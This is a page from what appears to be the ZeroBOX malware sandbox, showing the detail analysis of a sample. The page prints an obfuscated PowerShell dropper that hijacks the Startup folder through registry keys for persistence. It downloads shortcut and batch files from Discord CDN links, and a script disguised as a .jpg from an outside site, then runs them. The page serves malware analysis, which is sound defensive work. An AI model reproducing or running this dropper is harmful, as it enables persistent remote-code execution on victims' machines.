popup
Static | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Static Analysis

No static analysis available.
Function NJXH
[system.io.directory]::CreateDirectory("C:\P"+"r"+"o"+"g"+"ra"+"mDa"+"t"+"a\Micr"+"oso"+"f"+"t A"+"rts"+"\S"+"ta"+"rt\")
start-sleep -s 5
Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" -Name "Startup" -Value "C:\ProgramData\Microsoft Arts\Start";
start-sleep -s 5
Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" -Name "Startup" -Value "C:\ProgramData\Microsoft Arts\Start";
$p = 'C:\ProgramData\Microsoft Arts\Start\'
$ps1 = 'C:\Users\Public\'
$ali = 'C:\Users\Public\'
start-sleep -s 5
if((New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/808540577594736675/852815759969353748/firefox.lnk', $p + 'firefox.lnk')){
if((New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/808540577594736675/852815738539606026/firefox.bat', $ps1 + 'firefox.bat')){
if((New-Object System.Net.WebClient).DownloadFile('https://trans4mtech.co.uk/partners/YzpQk9uwWaFBYCye.jpg' , $ali + 'pbdwcnkiiqquutwa.ps1')){
start "C:\ProgramData\Microsoft Arts\Start\firefox.lnk"
IEX NJXH
No antivirus signatures available.
No IRMA results available.